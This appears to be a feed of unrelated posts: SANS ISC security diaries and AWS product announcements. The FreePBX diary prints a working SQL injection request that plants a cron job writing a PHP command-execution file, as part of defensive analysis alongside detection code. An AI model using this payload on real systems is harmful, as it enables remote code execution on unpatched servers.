Polymorphic Python Malware, (Wed, Oct 8th)

Today, I spotted an interesting Python RAT on VirusTotal. There are tons of them, but this one attracted my attention based on some function names present in the code: self_modifying_wrapper(), decrypt_and_execute(), and polymorph_code(). Polymorphic malware is malware that has been developed to repeatedly mutate its appearance or signature at every execution. The file got a very low score of 2/64 on VT! (SHA256: 7173e20e7ec217f6a1591f1fc9be6d0a4496d78615cc5ccdf7b9a3a37e3ecc3c)

Exploit Against FreePBX (CVE-2025-57819) with Code Execution, (Tue, Oct 7th)

FreePBX is a popular PBX system built around the open source VoIP system Asterisk. To manage Asterisk more easily, it provides a capable web-based admin interface. Sadly, like so many web applications, it has had its share of vulnerabilities in the past. Most recently, a SQL injection vulnerability was found that allows attackers to modify the database.

For a PBX, there are a number of obvious attacks. For example, they are often abused for free phone calls, to impersonate the companies running the PBX, or to hide the true origin of phone calls. Manipulating the FreePBX database would certainly facilitate these types of attacks. However, I noticed some slightly more interesting attacks recently attempting to achieve complete code execution.

A typical request looks like:

GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=x&model=model&brand=x' ;INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','takdak','echo "PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo="|base64 -d >/var/www/html/rspgf.php',NULL,'* * * * *',30,1,1) --

The "brand" parameter is used for the SQL injection, and the parameter decodes to:

 ;INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','takdak','echo "PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo="|base64 -d >/var/www/html/rspgf.php',NULL,'* * * * *',30,1,1) --

FreePBX uses the "cron_jobs" table to assist in the management of cron jobs. Inserting a row into the table results in simple, arbitrary code execution. The injected command creates a file, /var/www/html/rspgf.php, with the following content:

<?php header('x_poc: CVE-2025-57819'); echo shell_exec('uname -a'); unlink(__FILE__); ?>
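
To reproduce the decoding step, here is a quick Python sketch that decodes the base64 string from the injected SQL:

import base64

# Base64 payload copied from the injected cron_jobs command above.
payload = "PD9waHAgaGVhZGVyKCd4X3BvYzogQ1ZFLTIwMjUtNTc4MTknKTsgZWNobyBzaGVsbF9leGVjKCd1bmFtZSAtYScpOyB1bmxpbmsoX19GSUxFX18pOyA/Pgo="
print(base64.b64decode(payload).decode())  # prints the PHP shown above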

This gives a simple test to see whether the system is vulnerable. Interestingly, the file deletes itself after being accessed by the attacker. The cron job should persist and re-create the file every minute, which makes the "unlink" somewhat pointless. I do not see any hits in our honeypot for this file. Reviewing the cron_jobs table should be another good way to find similar exploits.
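
To hunt for similar persistence on a FreePBX host, a hedged sketch along these lines could flag suspicious cron_jobs rows; the pymysql dependency and the database credentials are assumptions, so adjust them to your installation:

# Hedged sketch: list cron_jobs entries that decode base64 or write into the
# webroot, both visible in the exploit above. Credentials are placeholders.
import pymysql

conn = pymysql.connect(host="localhost", user="freepbxuser",
                       password="CHANGEME", database="asterisk")
with conn.cursor() as cur:
    cur.execute("SELECT modulename, jobname, command FROM cron_jobs")
    for modulename, jobname, command in cur.fetchall():
        if "base64" in (command or "") or "/var/www/html" in (command or ""):
            print(f"suspicious job {modulename}/{jobname}: {command}")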

Please make sure your FreePBX instance is up to date. The vulnerability was initially made public on August 28th [1], and was already exploited at the time.

[1] https://community.freepbx.org/t/security-advisory-please-lock-down-your-administrator-access/107203

 


Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introducing new compute-optimized Amazon EC2 C8i and C8i-flex instances

After launching Amazon Elastic Compute Cloud (Amazon EC2) memory-optimized R8i and R8i-flex instances and general-purpose M8i and M8i-flex instances, I am happy to announce the general availability of compute-optimized C8i and C8i-flex instances. They are powered by custom Intel Xeon 6 processors, available only on AWS, deliver a sustained all-core turbo frequency of 3.9 GHz, and feature a 2:1 ratio of memory to vCPU. These instances deliver the highest performance and fastest memory bandwidth among comparable Intel processors in the cloud.

The C8i and C8i-flex instances offer up to 15 percent better price-performance and 2.5 times more memory bandwidth compared to C7i and C7i-flex instances. They are up to 60 percent faster for NGINX web applications, up to 40 percent faster for AI deep learning recommendation models, and up to 35 percent faster for Memcached stores compared to C7i and C7i-flex instances.

C8i and C8i-flex instances are ideal for running compute-intensive workloads, such as web servers, caching, Apache Kafka, Elasticsearch, batch processing, distributed analytics, high performance computing (HPC), ad serving, highly scalable multiplayer gaming, and video encoding.

Like other 8th generation instances, these instances use the new sixth generation AWS Nitro Cards, delivering up to two times more network and Amazon Elastic Block Store (Amazon EBS) bandwidth compared to previous generation instances. They also support bandwidth configuration with 25 percent allocation adjustments between network and Amazon EBS bandwidth, enabling better database performance, query processing, and logging speeds.

C8i instances
C8i instances provide up to 384 vCPUs and 768 GiB of memory, including bare metal instances that provide dedicated access to the underlying physical hardware. These instances help you run compute-intensive workloads, such as CPU-based inference and video streaming, that continuously need the largest instance sizes or high CPU performance.

Here are the specs for C8i instances:

Instance size | vCPUs | Memory (GiB) | Network bandwidth (Gbps) | EBS bandwidth (Gbps)
c8i.large | 2 | 4 | Up to 12.5 | Up to 10
c8i.xlarge | 4 | 8 | Up to 12.5 | Up to 10
c8i.2xlarge | 8 | 16 | Up to 15 | Up to 10
c8i.4xlarge | 16 | 32 | Up to 15 | Up to 10
c8i.8xlarge | 32 | 64 | 15 | 10
c8i.12xlarge | 48 | 96 | 22.5 | 15
c8i.16xlarge | 64 | 128 | 30 | 20
c8i.24xlarge | 96 | 192 | 40 | 30
c8i.32xlarge | 128 | 256 | 50 | 40
c8i.48xlarge | 192 | 384 | 75 | 60
c8i.96xlarge | 384 | 768 | 100 | 80
c8i.metal-48xl | 192 | 384 | 75 | 60
c8i.metal-96xl | 384 | 768 | 100 | 80

C8i-flex instances
C8i-flex instances are a lower-cost variant of the C8i instances, offering 5 percent better price performance at 5 percent lower prices. They are designed for workloads that benefit from the latest generation performance but don’t fully utilize all compute resources. These instances can reach the full CPU performance 95 percent of the time.

Here are the specs for the C8i-flex instances:

Instance size | vCPUs | Memory (GiB) | Network bandwidth (Gbps) | EBS bandwidth (Gbps)
c8i-flex.large | 2 | 4 | Up to 12.5 | Up to 10
c8i-flex.xlarge | 4 | 8 | Up to 12.5 | Up to 10
c8i-flex.2xlarge | 8 | 16 | Up to 15 | Up to 10
c8i-flex.4xlarge | 16 | 32 | Up to 15 | Up to 10
c8i-flex.8xlarge | 32 | 64 | Up to 15 | Up to 10
c8i-flex.12xlarge | 48 | 96 | Up to 22.5 | Up to 15
c8i-flex.16xlarge | 64 | 128 | Up to 30 | Up to 20

If you’re currently using earlier generations of compute-optimized instances, you can adopt C8i-flex instances without having to make changes to your application or your workload.

Now available
Amazon EC2 C8i and C8i-flex instances are available today in the US East (N. Virginia), US East (Ohio), US West (Oregon), and Europe (Spain) AWS Regions. C8i and C8i-flex instances can be purchased as On-Demand Instances, with Savings Plans, and as Spot Instances. C8i instances are also available as Dedicated Instances and on Dedicated Hosts. To learn more, visit the Amazon EC2 Pricing page.

Give C8i and C8i-flex instances a try in the Amazon EC2 console. To learn more, visit the Amazon EC2 C8i instances page and send feedback to AWS re:Post for EC2 or through your usual AWS Support contacts.
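
If you prefer the API to the console, here is a minimal boto3 sketch that launches a c8i.large instance; the AMI ID is a placeholder, so substitute a current one for your Region:

# Minimal sketch: launch a single c8i.large On-Demand instance with boto3.
import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")  # one of the launch Regions
response = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",  # placeholder AMI ID
    InstanceType="c8i.large",
    MinCount=1,
    MaxCount=1,
)
print(response["Instances"][0]["InstanceId"])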

Channy

AWS IAM Identity Center now supports customer-managed KMS keys for encryption at rest

Starting today, you can use your own AWS Key Management Service (AWS KMS) keys to encrypt identity data, such as user and group attributes, stored in AWS IAM Identity Center organization instances.

Many organizations operating in regulated industries need complete control over encryption key management. While Identity Center already encrypts data at rest using AWS-owned keys, some customers require the ability to manage their own encryption keys for audit and compliance purposes.

With this launch, you can now use customer-managed KMS keys (CMKs) to encrypt Identity Center identity data at rest. CMKs provide you with full control over the key lifecycle, including creation, rotation, and deletion. You can configure granular access controls to keys with AWS Key Management Service (AWS KMS) key policies and IAM policies, helping to ensure that only authorized principals can access your encrypted data. At launch time, the CMK must reside in the same AWS account and Region as your IAM Identity Center instance. The integration between Identity Center and KMS provides detailed AWS CloudTrail logs for auditing key usage and helps meet regulatory compliance requirements.

Identity Center supports both single-Region and multi-Region keys to match your deployment needs. While Identity Center instances can currently only be deployed in a single Region, we recommend using multi-Region AWS KMS keys unless your company policies restrict you to single-Region keys. Multi-Region keys provide consistent key material across Regions while maintaining independent key infrastructure in each Region. This gives you more flexibility in your encryption strategy and helps future-proof your deployment.

Let’s get started
Let’s imagine I want to use a CMK to encrypt the identity data of my Identity Center organization instance. My organization uses Identity Center to give employees access to AWS managed applications, such as Amazon Q Business or Amazon Athena.

As of today, some AWS managed applications cannot be used with Identity Center configured with a customer managed KMS key. See AWS managed applications that you can use with Identity Center to stay current with the evolving list of compatible applications.

The high-level process is to first create a symmetric customer managed key (CMK) in AWS KMS, configured for encrypt and decrypt operations. Next, I configure the key policies to grant access to Identity Center, AWS managed applications, administrators, and other principals who need to access the Identity Center and Identity Store service APIs. Depending on your usage of Identity Center, you’ll have to define different policies for the key and IAM policies for IAM principals. The service documentation has more details to help you cover the most common use cases.

This demo is in three parts. I first create a customer managed key in AWS KMS and configure it with permissions that will authorize Identity Center and AWS managed applications to use it. Second, I update the IAM policies for the principals that will use the key from another AWS account, such as AWS applications administrators. Finally, I configure Identity Center to use the key.

Part 1: Create the key and define permissions

First, let’s create a new CMK in AWS KMS.

AWS KMS, create key, part 1

The key must be in the same AWS Region and AWS account as the Identity Center instance. You must create the Identity Center instance and the key in the management account of your organization in AWS Organizations.

I navigate to the AWS Key Management Service (AWS KMS) console in the same Region as my Identity Center instance, then I choose Create a key. This launches me into the key creation wizard.

AWS KMS, create key, part 2

Under Step 1–Configure key, I select the key type–either Symmetric (a single key used for both encryption and decryption) or Asymmetric (a public-private key pair for encryption/decryption and signing/verification). Identity Center requires symmetric keys for encryption at rest. I select Symmetric.

For key usage, I select Encrypt and decrypt, which allows the key to be used only for encrypting and decrypting data.

Under Advanced options, I select KMS – recommended for Key material origin, so AWS KMS creates and manages the key material.

For Regionality, I choose between Single-Region or Multi-Region key. I select Multi-Region key to allow key administrators to replicate the key to other Regions. As explained already, Identity Center doesn’t require this today, but it helps to future-proof your configuration. Remember that you cannot convert a single-Region key to a multi-Region one after its creation (but you can change the key used by Identity Center).

Then, I choose Next to proceed with additional configuration steps, such as adding labels, defining administrative permissions, setting usage permissions, and reviewing the final configuration before creating the key.

AWS KMS, create key, part 3

Under Step 2–Add Labels, I enter an Alias name for my key and select Next.

In this demo, I am editing the key policy by adding policy statements using templates provided in the documentation. I skip Step 3 and Step 4 and navigate to Step 5–Edit key policy.

AWS KMS, create key, part 5

Identity Center requires, at a minimum, permissions allowing Identity Center and its administrators to use the key. Therefore, I add four policy statements: the first two authorize the administrators of the service, and the last two authorize the Identity Center and Identity Store services themselves.

{
	"Version": "2012-10-17",
	"Id": "key-consolepolicy-3",
	"Statement": [
		{
			"Sid": "Allow_IAMIdentityCenter_Admin_to_use_the_KMS_key_via_IdentityCenter_and_IdentityStore",
			"Effect": "Allow",
			"Principal": {
				"AWS": "ARN_OF_YOUR_IDENTITY_CENTER_ADMIN_IAM_ROLE"
			},
			"Action": [
				"kms:Decrypt",
				"kms:Encrypt",
				"kms:GenerateDataKeyWithoutPlaintext"
			],
			"Resource": "*",
			"Condition": {
				"StringLike": {
					"kms:ViaService": [
						"sso.*.amazonaws.com",
						"identitystore.*.amazonaws.com"
					]
				}
			}
		},
		{
			"Sid": "Allow_IdentityCenter_admin_to_describe_the_KMS_key",
			"Effect": "Allow",
			"Principal": {
				"AWS": "ARN_OF_YOUR_IDENTITY_CENTER_ADMIN_IAM_ROLE"
			},
			"Action": "kms:DescribeKey",
			"Resource": "*"
		},
		{
			"Sid": "Allow_IdentityCenter_and_IdentityStore_to_use_the_KMS_key",
			"Effect": "Allow",
			"Principal": {
				"Service": [
					"sso.amazonaws.com",
					"identitystore.amazonaws.com"
				]
			},
			"Action": [
				"kms:Decrypt",
				"kms:ReEncryptTo",
				"kms:ReEncryptFrom",
				"kms:GenerateDataKeyWithoutPlaintext"
			],
			"Resource": "*",
            "Condition": {
    	       "StringEquals": { 
                      "aws:SourceAccount": "<Identity Center Account ID>" 
	           }
            }		
		},
		{
			"Sid": "Allow_IdentityCenter_and_IdentityStore_to_describe_the_KMS_key",
			"Effect": "Allow",
			"Principal": {
				"Service": [
					"sso.amazonaws.com",
					"identitystore.amazonaws.com"
				]
			},
			"Action": [
				"kms:DescribeKey"
			],
			"Resource": "*"
		}		
	]
}

I also have to add additional policy statements to allow my use case: the use of AWS managed applications. I add these two policy statements to authorize AWS managed applications and their administrators to use the KMS key. The documentation lists additional use cases and their respective policies.

{
    "Sid": "Allow_AWS_app_admins_in_the_same_AWS_organization_to_use_the_KMS_key",
    "Effect": "Allow",
    "Principal": "*",
    "Action": [
        "kms:Decrypt"
    ],
    "Resource": "*",
    "Condition": {
        "StringEquals" : {
           "aws:PrincipalOrgID": "MY_ORG_ID (format: o-xxxxxxxx)"
        },
        "StringLike": {
            "kms:ViaService": [
                "sso.*.amazonaws.com", "identitystore.*.amazonaws.com"
            ]
        }
    }
},
{
   "Sid": "Allow_managed_apps_to_use_the_KMS_Key",
   "Effect": "Allow",
   "Principal": "*",
   "Action": [
      "kms:Decrypt"
    ],
   "Resource": "*",
   "Condition": {
      "Bool": { "aws:PrincipalIsAWSService": "true" },
      "StringLike": {
         "kms:ViaService": [
             "sso.*.amazonaws.com", "identitystore.*.amazonaws.com"
         ]
      },
      "StringEquals": { "aws:SourceOrgID": "MY_ORG_ID (format: o-xxxxxxxx)" }
   }
}

You can further restrict the key usage to a specific Identity Center instance, specific application instances, or specific application administrators. The documentation contains examples of advanced key policies for your use cases.

To help protect against IAM role name changes when permission sets are recreated, use the approach described in the Custom trust policy example.
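
If you script your setup rather than using the console wizard, here is a minimal boto3 sketch under the same assumptions; the policy file name and alias are illustrative, not part of the official procedure:

# Minimal sketch: create the symmetric, multi-Region CMK programmatically,
# with the key policy from above saved locally as key-policy.json.
import boto3

kms = boto3.client("kms", region_name="us-east-1")
with open("key-policy.json") as f:
    policy = f.read()

key = kms.create_key(
    Policy=policy,
    KeyUsage="ENCRYPT_DECRYPT",   # encrypt and decrypt only
    KeySpec="SYMMETRIC_DEFAULT",  # Identity Center requires a symmetric key
    MultiRegion=True,             # allows replication to other Regions later
)
kms.create_alias(
    AliasName="alias/identity-center-cmk",  # illustrative alias
    TargetKeyId=key["KeyMetadata"]["KeyId"],
)
print(key["KeyMetadata"]["Arn"])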

Part 2: Update IAM policies to allow use of the KMS key from another AWS account

Any IAM principal that uses the Identity Center service APIs from another AWS account, such as Identity Center delegated administrators and AWS application administrators, needs an IAM policy statement that allows use of the KMS key via these APIs.

I grant permissions to access the key by creating a new policy and attaching the policy to the IAM role relevant for my use case. You can also add these statements to the existing identity-based policies of the IAM role.

To do so, after the key is created, I locate its ARN and replace the key_ARN placeholder in the template below. Then, I attach the policy to the managed application administrator IAM principal. The documentation also covers IAM policies that grant Identity Center delegated administrators permissions to access the key.

Here is an example for managed application administrators:

{
      "Sid": "Allow_app_admins_to_use_the_KMS_key_via_IdentityCenter_and_IdentityStore",
      "Effect": "Allow",
      "Action": 
        "kms:Decrypt",
      "Resource": "<key_ARN>",
      "Condition": {
        "StringLike": {
          "kms:ViaService": [
            "sso.*.amazonaws.com",
            "identitystore.*.amazonaws.com"
          ]
        }
      }
    }

The documentation shares IAM policy templates for the most common use cases.

Part 3: Configure IAM Identity Center to use the key

I can configure a CMK either during the enablement of an Identity Center organization instance or on an existing instance, and I can change the encryption configuration at any time by switching between CMKs or reverting to AWS-owned keys.

Please note that an incorrect configuration of KMS key permissions can disrupt Identity Center operations and access to AWS managed applications and accounts through Identity Center. Proceed carefully with this final step and make sure you have read and understood the documentation.

After I have created and configured my CMK, I can select it under Advanced configuration when enabling Identity Center.

IDC with CMK configuration

To configure a CMK on an existing Identity Center instance using the AWS Management Console, I start by navigating to the Identity Center section of the AWS Management Console. From there, I select Settings from the navigation pane, then I select the Management tab, and select Manage encryption in the Key for encrypting IAM Identity Center data at rest section.

Change key on existing IDC

At any time, I can select another CMK from the same AWS account, or switch back to an AWS-owned key.

After choosing Save, the key change process takes a few seconds to complete. All service functionality continues uninterrupted during the transition. If, for whatever reason, Identity Center cannot access the new key, an error message is returned and Identity Center continues to use the current key, keeping your identity data encrypted with the mechanism already in place.

CMK on IDC, select a new key

Things to keep in mind
The encryption key you create becomes a crucial component of your Identity Center instance. When you choose to use your own managed key to encrypt identity attributes at rest, verify the following points.

  • Have you configured the necessary permissions to use the KMS key? Without proper permissions, enabling the CMK may fail or disrupt IAM Identity Center administration and AWS managed applications.
  • Have you verified that your AWS managed applications are compatible with CMKs? For a list of compatible applications, see AWS managed applications that you can use with IAM Identity Center. Enabling a CMK for an Identity Center instance that is used by AWS managed applications incompatible with CMKs will result in operational disruption for those applications. If you have incompatible applications, do not proceed.
  • Is your organization using AWS managed applications that require additional IAM role configuration to use the Identity Center and Identity Store APIs? For each such AWS managed application that’s already deployed, check the managed application’s User Guide for updated KMS key permissions for IAM Identity Center usage and update them as instructed to prevent application disruption.
  • For brevity, the KMS key policy statements in this post omit the encryption context, which lets you restrict the use of the KMS key to Identity Center, including to a specific instance. For your production scenarios, you can add a condition like this for Identity Center:
    "Condition": {
       "StringLike": {
          "kms:EncryptionContext:aws:sso:instance-arn": "${identity_center_arn}",
          "kms:ViaService": "sso.*.amazonaws.com"
        }
    }

    or this for Identity Store:

    "Condition": {
       "StringLike": {
          "kms:EncryptionContext:aws:identitystore:identitystore-arn": "${identity_store_arn}",
          "kms:ViaService": "identitystore.*.amazonaws.com"
        }
    }

Pricing and availability
Standard AWS KMS charges apply for key storage and API usage. Identity Center remains available at no additional cost.

This capability is now available in all AWS commercial Regions, AWS GovCloud (US), and AWS China Regions. To learn more, visit the IAM Identity Center User Guide.

We look forward to learning how you use this new capability to meet your security and compliance requirements.

— seb

AWS Weekly Roundup: Amazon Bedrock, AWS Outposts, Amazon ECS Managed Instances, AWS Builder ID, and more (October 6, 2025)

Last week, Anthropic’s Claude Sonnet 4.5, the world’s best coding model according to SWE-Bench, became available in the Amazon Q command line interface (CLI) and Kiro. I’m excited about this for two reasons:

First, a few weeks ago I spent 4 intensive days with a global customer delivering an AI-assisted development workshop, where I experienced firsthand how Amazon Q CLI boosts developer productivity. During the workshop, the customer was able to add a new feature to their application within a day using Amazon Q CLI, something that would traditionally have taken them at least a couple of weeks. With Anthropic’s Claude Sonnet 4.5 in Amazon Q CLI, I know developer productivity will be enhanced further.

Second, I’ve started preparing for my code talk at AWS re:Invent 2025, where my co-speaker and I will show live coding to modernize a legacy codebase using Kiro. I can’t wait to use Anthropic’s Claude Sonnet 4.5 in Kiro to create a live demo. If you want to see this demo and over a thousand other sessions on cloud and AI, join us at AWS re:Invent 2025 in Las Vegas from December 1–5.

Last week’s launches
Here are some launches that got my attention:

  • Availability of Claude Sonnet 4.5 in Amazon Bedrock – Anthropic’s most intelligent model, best for coding and complex agents, is now available in Amazon Bedrock. By using Claude Sonnet 4.5 in Amazon Bedrock, developers gain access to a fully managed service that not only provides a unified API for foundation models (FMs) but also keeps their data under complete control, with enterprise-grade tools for security and optimization.
  • AWS Outposts supports third-party storage integration with Dell and HPE – AWS Outposts third-party storage integration now includes Dell PowerStore and HPE Alletra Storage MP B10000 systems, joining the list of existing integrations with NetApp on-premises enterprise storage arrays and Pure Storage FlashArray. This integration serves three key purposes. First, it helps you maintain your existing storage infrastructure while migrating VMware workloads to AWS. Second, it helps you meet strict data residency requirements by keeping your data on premises while using AWS services. Third, it means you can use AWS Outposts with third-party storage arrays through AWS tooling.
  • Amazon ECS Managed Instances now available – Amazon ECS Managed Instances for containerized applications is a new fully managed compute option for Amazon ECS designed to eliminate infrastructure management overhead while giving you access to the full capabilities of Amazon EC2. ECS Managed Instances helps you quickly launch and scale your workloads while enhancing performance and reducing your total cost of ownership.
  • Application map is now generally available for Amazon CloudWatch – Amazon CloudWatch now helps you monitor large-scale distributed applications by automatically discovering and organizing services into groups based on configurations and their relationships. With this new application performance monitoring (APM) capability, you can quickly visualize which applications and dependencies to focus on while troubleshooting your distributed applications.
  • Amazon Bedrock AgentCore Model Context Protocol (MCP) server now available – With built-in support for runtime, gateway integration, identity management, and agent memory, the AgentCore MCP server is purpose-built to speed up creation of components compatible with Bedrock AgentCore. You can use the AgentCore MCP server for rapid prototyping, production AI solutions, or to scale your agent infrastructure.

Additional updates
Here are some additional news items and blog posts that I found interesting:

  • AWS Builder ID now supports Sign in with Google – You can now create an AWS Builder ID using Sign in with Google. AWS Builder ID is a personal profile that provides access to AWS applications including Kiro, AWS Builder Center, AWS Training and Certification, AWS re:Post, and AWS Startups.
  • AWS API MCP Server v1.0.0 release – The AWS API MCP Server acts as a bridge between AI assistants and AWS services, enabling foundation models to interact with any AWS API through natural language by creating and executing syntactically correct CLI commands. The AWS API MCP Server is open source and available now in the AWS Labs GitHub repository.
  • AWS Knowledge MCP Server now generally available – The AWS Knowledge server gives AI agents and MCP clients access to authoritative knowledge, including documentation, blog posts, What’s New announcements, and Well-Architected best practices, in an LLM-compatible format. With this release, the server also includes knowledge about the regional availability of AWS APIs and CloudFormation resources.
  • AWS Transform now enables Terraform for VMware network automation – AWS Transform now offers Terraform as an additional option to generate network infrastructure code automatically from VMware environments. The service converts your source network definitions into reusable Terraform modules, complementing current AWS CloudFormation and AWS Cloud Development Kit (CDK) support.

Upcoming AWS events
Check your calendar and sign up for upcoming AWS events:

  • AWS AI Agent Global Hackathon – This is your chance to dive deep into our powerful generative AI stack and create something truly awesome. From September 8th to October 20th, you have the opportunity to create AI agents using the AWS suite of AI services, competing for over $45,000 in prizes and exclusive go-to-market opportunities.
  • AWS Gen AI Lofts – You can learn about AWS AI products and services in exclusive sessions, meet industry-leading experts, and enjoy valuable networking opportunities with investors and peers. Register in your nearest city: Paris (October 7–21), London (October 13–21), and Tel Aviv (November 11–19).
  • AWS Community Days – Join community-led conferences that feature technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from around the world: Munich (October 7), Budapest (October 16).

You can browse all upcoming AWS events and AWS startup events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Prasad

More .well-known Scans, (Thu, Oct 2nd)

I have written about the ".well-known" directory a few times before: recently, about attackers hiding webshells [1], and earlier, about the purpose of the directory and why you should set up a "/.well-known/security.txt" file. But I noticed something else when I looked at today's logs on this web server. Sometimes you do not need a honeypot; some attackers are noisy enough to be easily visible on a busy web server. This time, the attacker hit various URLs inside the ".well-known" directory. Here is a sample from the > 100 URLs hit:

[Guest Diary] Comparing Honeypot Passwords with HIBP, (Wed, Oct 1st)

[This is a Guest Diary by Draden Barwick, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

DShield Honeypots are constantly exposed to the internet and inundated with exploit traffic, login attempts, and other malicious activity. Analyzing the logged password attempts can help identify what attackers are targeting. To go through these passwords, I have created a tool that leverages HaveIBeenPwned’s (HIBP’s) API to flag passwords that haven’t appeared in any breaches.

Purpose

Identifying passwords that haven’t been seen in known breaches is useful because it can indicate additional planning and help identify patterns in these less common passwords. Anyone who operates a honeypot (and receives a lot of data on attempted use of passwords in plaintext) could benefit from this project as an additional starting point for investigations.

Development

HaveIBeenPwned maintains a large database of breached passwords and offers an API to tell if a given password has been compromised. This is done by making a request to “https://api.pwnedpasswords.com/range/#####”, where the “#####” part is the first 5 characters (prefix) of the SHA1 hash of the tested password. The site returns the last 35 characters (suffix) of every password hash in the database that starts with the provided prefix. Each entry includes a count of how many times the corresponding password has been seen in breaches. This prevents anyone from knowing the full hash of the password we are looking for based on the request alone. While this consideration is not important for our use with the DShield honeypots (as all passwords seen are publicly uploaded), it is important to understand because HIBP does not allow searching with the full hash directly [2].
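
The range lookup itself is small. Here is a minimal standalone sketch of the k-anonymity query (not the author's script, which is linked below); the user agent matches the one the project uses:

import hashlib
import urllib.request

def pwned_count(password: str) -> int:
    # Only the first 5 hex characters of the SHA1 hash leave this machine.
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    req = urllib.request.Request(
        f"https://api.pwnedpasswords.com/range/{prefix}",
        headers={"User-Agent": "PasswordCheckingProject"},  # HIBP requires a user agent
    )
    with urllib.request.urlopen(req) as resp:
        for line in resp.read().decode().splitlines():
            hash_suffix, _, count = line.partition(":")
            if hash_suffix == suffix:
                return int(count)  # times seen in breaches
    return 0  # never seen by HIBP

print(pwned_count("password123"))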

To gather a list of all the passwords my honeypot has collected, I used JQ to parse the cowrie.json files located in the /srv/cowrie/var/log/cowrie directory. This command matches any login failures or successes and returns the password field from matching entries:

jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* 

To extend this, we can remove duplicates using sort and uniq and save the unique passwords to a file:

jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* | sort | uniq > ~/uniquepass.txt

As of writing, this took the number of passwords from 51,601 to 16,210 unique passwords.

Now that we have a list of unique passwords, the next steps are to: read the created password file, take the SHA1 hash of each line, query the API for the hash prefix, and check for the hash suffix in the results.

To accomplish this, I created a Python script that utilizes one input file and two output files. The input file has a list of passwords to check with one entry per line. One output file stores all passwords that have been checked, the SHA1 hash, and how many times HIBP has seen the password (this file is a CSV used to avoid checking a password in the input file if it has been checked before). The other output file stores the plaintext of any password never seen by HIBP. The command line usage looks like this:

python3 queryHIBP.py uniquepass.txt passwordResults.csv unseenPasswords.txt

This resulted in the identification of 1,196 passwords that HIBP has not seen.

Code Breakdown

The code, available on GitHub [3], has thorough commenting, but we will examine some parts here to gain a deeper understanding of how it functions.

In Figure 1, we can see the section of code that handles reading the results file that includes all passwords we have searched for. This is expected to be formatted as a CSV file with a header of “password,sha1,count”. As explained above, this helps avoid checking passwords unnecessarily.

The code opens the file with csv.DictReader, checks for “password” in the header, then uses a for loop to go through all of the rows to pull non-empty passwords and add them to a set. The set is returned at the end of the function.

 
Figure 1: Code used to read all previously checked passwords.
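
Since the figure may not render in this format, here is a hedged reconstruction of that logic; the authoritative version is in the GitHub repository [3]:

import csv

def load_checked_passwords(path: str) -> set:
    """Return the set of passwords already present in the results CSV."""
    checked = set()
    try:
        with open(path, newline="") as f:
            reader = csv.DictReader(f)  # expects a "password,sha1,count" header
            if reader.fieldnames and "password" in reader.fieldnames:
                for row in reader:
                    if row["password"]:  # skip empty cells
                        checked.add(row["password"])
    except FileNotFoundError:
        pass  # first run: no results file yet
    return checked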

 

In Figure 2, we can see the code used to make API requests and handle a common error. First, a loop is established and the API request is made. Second, we check for a 429 response code, which means there were too many requests. If there was a 429 error, HIBP will add a “Retry-After” header, which lets us know how long to wait before trying again. The user agent is specified elsewhere as “PasswordCheckingProject” because HIBP states that “A missing user agent will result in an HTTP 403 response” [4].


Figure 2: Code used to make API requests and handle expected 429 errors.
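
Again as a hedged reconstruction of the behavior described above (the real code is in the repository [3], and the requests dependency is an assumption):

import time
import requests

def query_range(prefix: str, max_retries: int = 3) -> requests.Response:
    attempt = 0
    while True:
        resp = requests.get(
            f"https://api.pwnedpasswords.com/range/{prefix}",
            headers={"User-Agent": "PasswordCheckingProject"},
        )
        if resp.status_code != 429:  # not rate limited
            return resp
        attempt += 1
        if attempt >= max_retries:
            raise SystemExit(f"giving up on prefix {prefix}: too many 429s")
        # HIBP tells us how long to wait before retrying.
        time.sleep(int(resp.headers.get("Retry-After", "5")))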

 

Figure 3 shows the behavior for handling additional errors and normal operation. First, “resp.raise_for_status()” is called, which raises an exception if there was an error with the HTTP request. If there’s no error, we simply iterate through all lines of the response to save the hash suffixes and counts in a dictionary, then return it. If an exception is raised, we increment an “attempt” variable, which lets us cap the number of retries (three by default). If the maximum is hit here, the code prints an error message indicating which prefix was being checked and exits. If there are retries remaining, the script waits 5 seconds before continuing. Figure 2 has a similar check for max retries to avoid a potential infinite loop of 429 errors.


Figure 3: Code used to store & return request results or deal with continued/unexpected errors.

 

Implementation

To download the project and try it out with some test data, one can run the following:

git clone https://github.com/MeepStryker/queryHIBP.git
cd queryHIBP
python3 queryHIBP.py ./sampleInput.txt ./passwordResults.csv ./unseenPasswords.txt

As the script runs, it will print out each unseen password identified and a short summary at the end as seen in Figure 4.


Figure 4: Script output using real data.

 

Automation

To automate the use of this tool, I created a cron job to run the JQ command and output the results to a file, and another job to run the script with the needed arguments. These are set to run daily, with the script running 5 minutes after the JQ command. This uses the following crontab entries:

0 17 * * * jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* | sort | uniq > ~/uniquepass.txt

5 17 * * * python3 ~/queryHIBP.py ~/uniquepass.txt ~/passwordResults.csv ~/unseenPasswords.txt

